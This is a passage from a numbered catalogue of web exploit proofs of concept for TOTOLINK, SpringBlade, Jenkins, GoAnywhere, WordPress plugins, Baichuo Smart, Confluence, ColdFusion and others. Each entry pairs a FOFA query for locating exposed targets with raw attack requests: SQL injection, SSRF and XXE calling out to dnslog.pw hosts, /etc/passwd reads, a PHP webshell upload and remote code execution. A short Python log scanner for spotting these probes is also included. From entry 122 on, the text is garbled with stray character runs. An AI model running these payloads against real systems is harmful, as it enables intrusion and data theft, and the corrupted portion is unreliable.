SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document, which is:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

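The request-line probes in entries 101, 105 to 114 and 117 above (the Ivanti keys-status traversal, the GoAnywhere ..;/ bypass, the Jenkins /cli endpoint, the D-Tale web-upload URL, the WP Automatic file:// download and the updatexml()/SLEEP() SQL injection markers) all survive in an ordinary web-server access log, which is the cheapest place for a defender to look for them after the fact. The script below is an added example for this article, not code from the original author or from any of the listed vendors. It parses a few constructed combined-log-format lines, URL-decodes each path twice so single- and double-encoded variants normalise to the same string, and reports the first matching signature per line. The log lines, client addresses, the callback.example host and the rule names are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed combined-log-format lines (example data, not from the original article).
# Client addresses use RFC 5737 documentation ranges; callback.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2024:10:00:01 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bid HTTP/1.1" 200 512
198.51.100.7 - - [10/Feb/2024:10:00:02 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 4096
192.0.2.9 - - [10/Feb/2024:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
198.51.100.7 - - [10/Feb/2024:10:00:04 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 80
203.0.113.5 - - [10/Feb/2024:10:00:05 +0000] "POST /cli?remoting=false HTTP/1.1" 200 0
192.0.2.9 - - [10/Feb/2024:10:00:06 +0000] "GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fcallback.example HTTP/1.1" 500 64
192.0.2.9 - - [10/Feb/2024:10:00:07 +0000] "GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1200
192.0.2.9 - - [10/Feb/2024:10:00:08 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 200
"""

# Combined log format: client ident user [timestamp] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Request-line signatures taken from the POCs listed in this section. The list is
# ordered: product-specific rules first, the generic time-based SQLi marker last.
SIGNATURES = [
    ("CVE-2024-21887 Ivanti command injection via keys-status path traversal",
     re.compile(r"/api/v1/totp/user-backup-code/\.\./\.\./license/keys-status/;", re.I)),
    ("CVE-2024-0204 GoAnywhere MFT InitialAccountSetup auth bypass",
     re.compile(r"/goanywhere/.*\.\.;/wizard/InitialAccountSetup\.xhtml", re.I)),
    # The file argument of the Jenkins probe is in the POST body, which an access log
    # never records, so this rule can only flag the endpoint being hit at all.
    ("CVE-2024-23897 Jenkins CLI endpoint access",
     re.compile(r"^/cli\?remoting=false", re.I)),
    ("CVE-2024-21642 D-Tale web-upload SSRF",
     re.compile(r"/dtale/web-upload\?.*url=https?://", re.I)),
    ("CVE-2024-27954 WP Automatic file:// download",
     re.compile(r"wp_automatic=download&link=file:", re.I)),
    ("SpringBlade updatexml() error-based SQL injection",
     re.compile(r"/api/blade-system/\S*\?.*updatexml\(", re.I)),
    ("time-based SQL injection probe (SLEEP)",
     re.compile(r"\bSLEEP\(", re.I)),
]


def normalise_path(path: str) -> str:
    """URL-decode the request path twice so single- and double-encoded probes compare equal."""
    for _ in range(2):
        path = unquote(path)
    return path


def classify(decoded_path: str):
    """Return the name of the first signature matching an already-decoded path, or None."""
    for name, pattern in SIGNATURES:
        if pattern.search(decoded_path):
            return name
    return None


def scan_access_log(log_text: str):
    """Return one dict per suspicious line: client, method, status, rule name, decoded path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip it rather than abort the scan
        decoded = normalise_path(m.group("path"))
        name = classify(decoded)
        if name:
            hits.append({"ip": m.group("ip"), "method": m.group("method"),
                         "status": int(m.group("status")), "rule": name, "path": decoded})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f'{h["ip"]:<14} {h["method"]:<5} {h["status"]}  {h["rule"]}')
```

Run against the constructed sample it reports seven of the eight lines and leaves the /wp-login.php request alone. The same patterns are what a WAF or SIEM rule for these entries would carry; the double-decode step matters because these probes are routinely seen with the `;`, `/` and `(` characters percent-encoded once or twice, and a match on the raw request line would miss those variants.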
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能s200管理平台/importexport.php sql注入
# @' ]: T# A& c3 ECVE-2024-27718FOFA:title="Smart管理平台"
$ S2 S$ m- S- X3 H其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
! a5 o% F2 ]) E* E' n0 OGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1' R6 \( N# D4 f7 Q6 y# B
Host: x.x.x.x" B9 u# i. e5 K
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0, e3 S4 E- g1 x3 K( G* |# m% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 d9 O% [ i6 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: a3 l$ g) g' i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 o6 o( T7 B/ P$ CAccept-Encoding: gzip, deflate, br6 g. g- y0 ], _5 c
Upgrade-Insecure-Requests: 1
$ K8 F$ O4 v/ D4 PSec-Fetch-Dest: document- @/ C4 j; K4 E) a9 s) J
Sec-Fetch-Mode: navigate
+ \: U a q$ S2 CSec-Fetch-Site: none$ [+ m/ e+ c) Y
Sec-Fetch-User: ?1: `' l3 S1 m% \. s
Te: trailers. H$ q7 ?( F2 K1 L' q
Connection: close r5 r+ ^$ B: Q% l$ M
6 \( r8 _3 B k
7 ^6 l' e2 N) B* }123. Atlassian Confluence 模板注入代码执行
5 }. c. q& o! z2 ^! FFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
2 @( U4 m" v" Z' w0 d' J! {POST /template/aui/text-inline.vm HTTP/1.1
7 M6 v. m: \+ ~+ OHost: localhost:8090& ^- f# a, y8 \8 j9 T
Accept-Encoding: gzip, deflate, br* ~; ]! o, ~" B$ J7 n
Accept: */*/ j* q: d" i) ]# M. ?
Accept-Language: en-US;q=0.9,en;q=0.8
: y( b6 E9 r1 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36* B% J x, O4 P$ n- B0 \0 y3 [
Connection: close
5 U0 W# G8 K4 v- I' m P1 sContent-Type: application/x-www-form-urlencoded
( L! u2 }1 I/ f" j1 J" n5 h3 X( H2 \' g
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))4 B4 \9 Z! `+ }, E8 a) y- s4 y
0 [! O, ~3 H- y
; O4 \% Q: \( u/ n124. 湖南建研工程质量检测系统任意文件上传$ r! k5 u V5 d$ k9 P
FOFA:body="/Content/Theme/Standard/webSite/login.css"5 v5 A3 H! [9 d( `6 u9 I3 Z
POST /Scripts/admintool?type=updatefile HTTP/1.18 O$ O# B5 f1 d
Host: 192.168.40.130:8282
i6 X. }2 J0 t$ L9 _2 s! }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; s4 o4 w, E; p" ]: BContent-Length: 72
! k0 r0 l& S5 K) g) [9 h6 s/ a# ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
4 g* p( r$ E! h& j5 E* GAccept-Encoding: gzip, deflate, br
/ `) b- p5 Y8 K& w' o2 }" a: i4 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ y3 e5 N- I; t- n" A J
Connection: close' M# a( ^: j, B6 I$ r
Content-Type: application/x-www-form-urlencoded
& V4 \7 Q' d5 K7 ^6 C( v% J* x9 T( i: E5 U: ^8 K
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
' N, z6 O% s& E' C! s, B8 Y' U
/ Z2 T6 `2 ^' I2 g, L B5 K7 J3 A6 Q& i4 A" G" w6 l
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) j. a' V; g( h% b% q; D. n/ E1 J( ~7 i! ^( [3 ?
125. ConnectWise ScreenConnect身份验证绕过
' j0 O! m+ y5 N$ Z3 {CVE-2024-17098 m6 t& \1 b7 E I$ ^( l/ F
FOFA:icon_hash="-82958153"
. K3 s3 c6 U1 {https://github.com/watchtowrlabs ... bypass-add-user-poc. \9 t! G- k% ?/ S" D# g
4 _) E# z$ T3 r
# [( O- J5 h6 O% `
使用方法1 L( f9 p+ g( H7 f' v* ~
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!4 r! {) n3 \* T0 s, j
6 M0 Q+ V" {5 h! v- P$ L) Z
8 G) m3 @. S* O创建好用户后直接登录后台,可以执行系统命令。7 z5 p5 s E" ~% }7 e
( O2 J1 r' b! Z P$ y4 }7 A8 D N
126. Aiohttp 路径遍历, ]4 b1 l) I3 ]% s! I
FOFA:title=="ComfyUI"
% l" R5 e' d) kGET /static/../../../../../etc/passwd HTTP/1.1
! L' [2 h- i ZHost: x.x.x.x9 x7 @0 K; K4 k3 J; ~$ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! H% z5 g" S) g# G( H0 e2 c- S2 U( GConnection: close
7 n5 i, a; { d! p4 D; }! NAccept: */*
) Y2 S: s! j* w4 YAccept-Language: en
2 X; Y* u+ v3 t0 ?; Z0 G& Q9 {Accept-Encoding: gzip
; u- |' A7 Z! Z: ]. ?+ u: b: w, Y4 o$ ~# A8 Y- A& `; j. ?
( g+ X. k# `4 v! [1 _127. 广联达Linkworks DataExchange.ashx XXE& v' R) J- p ~$ o, u4 _4 q
FOFA:body="Services/Identification/login.ashx"
% @0 `. h% {2 RPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.11 I8 r3 }; Q2 x) d Z+ U
Host: 192.168.40.130:8888
0 m7 C+ M4 @: H, E5 y' BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
7 a7 w! Y" m0 }( gContent-Length: 415; ?) E. _5 N8 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, Q5 I" p% x8 A* O4 _/ x% z! ^
Accept-Encoding: gzip, deflate
9 R, l0 b( f( P6 i P% UAccept-Language: zh-CN,zh;q=0.90 ?& x, ^( b% C$ X4 Z5 f% {4 u; p! R+ ]
Connection: close
1 R2 k+ }) a8 Q4 N a* uContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0$ Y( t8 i" T i$ x, g
Purpose: prefetch9 ?! ?5 k4 \0 _. A! a
Sec-Purpose: prefetch;prerender* T- ^( {( _* y9 r. V- `
$ I5 `+ S0 D$ F! `) n------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 t6 q, m; Q5 AContent-Disposition: form-data;name="SystemName"
# P! y: f" f* r) { t$ {7 V. h0 L5 L$ G+ m: b9 X
BIM
! ~+ k) e4 C* _3 z------WebKitFormBoundaryJGgV5l5ta05yAIe0" t" V' }9 [) |6 d& R6 V
Content-Disposition: form-data;name="Params"
0 O G2 B8 v! q7 |2 YContent-Type: text/plain4 Z8 M% L+ F5 B2 _6 n* T, E7 _
* y t, Y4 i- U
<?xml version="1.0" encoding="UTF-8"?>
( u7 I' ~; v$ M( a! |<!DOCTYPE test [
+ T" E/ ~0 H9 I$ y" ?! U3 y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">+ f- w. ]( s" l
]
# U' _8 F) t+ W ]>+ r9 O% X, K* n! k
<test>&t;</test>
# ?/ J+ @# R3 T1 k6 U2 h4 V( c3 X! b------WebKitFormBoundaryJGgV5l5ta05yAIe0--
) ?1 z- ^* |+ i- s" T4 v: C9 X1 U8 r2 [' t& U0 U- Q
" d; Y: u, x+ o- f8 O0 a, F3 f7 E# [, S5 U) U
128. Adobe ColdFusion 反序列化
8 y0 n" f) g3 `0 ^# }CVE-2023-38203: M; a- u+ y! J \8 G+ z- X
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)8 O3 a( R# z, k( N: F$ U
FOFA:app="Adobe-ColdFusion"
. W; }8 B; m0 O: T" ^PAYLOAD, Q1 \1 F6 ~ G- _/ O& @5 E% }( f
, p' q7 C# v- _6 t1 w- F) H
129. Adobe ColdFusion 任意文件读取 Y" m* S) s' j# b) u2 L
CVE-2024-20767
& r u2 p! p& O! V7 o- L% _0 a. cFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"6 d9 z. o6 `5 D: U) C
第一步,获取uuid: ?# S1 E5 `3 R4 `+ G
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% k0 l$ q# s8 R/ ?
Host: x.x.x.x" \3 K, U( D# ?* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 [* U; e8 [0 n/ j5 {( dAccept: */*, C; P3 ]' h9 U0 R% h7 _; A& o3 T
Accept-Encoding: gzip, deflate
' q/ j, e- }( [0 A: c/ C# IConnection: close
: e3 e# G1 N' F1 J8 Y1 C$ H) J1 t3 V6 l. A1 P0 H
( u% w1 K' O( O$ c9 }
第二步,读取/etc/passwd文件! M( `! K0 A/ b. A7 \
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1' E* I, A. ^, I$ f
Host: x.x.x.x2 h1 G) H# ~, P+ E1 O6 X5 K6 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ a( ?9 m5 H }: m
Accept: */*
# \4 a8 d3 J% y- l s3 vAccept-Encoding: gzip, deflate* z. ^/ [* P- _* U; `0 |. _! d4 L
Connection: close8 C" W3 e! b1 @/ g
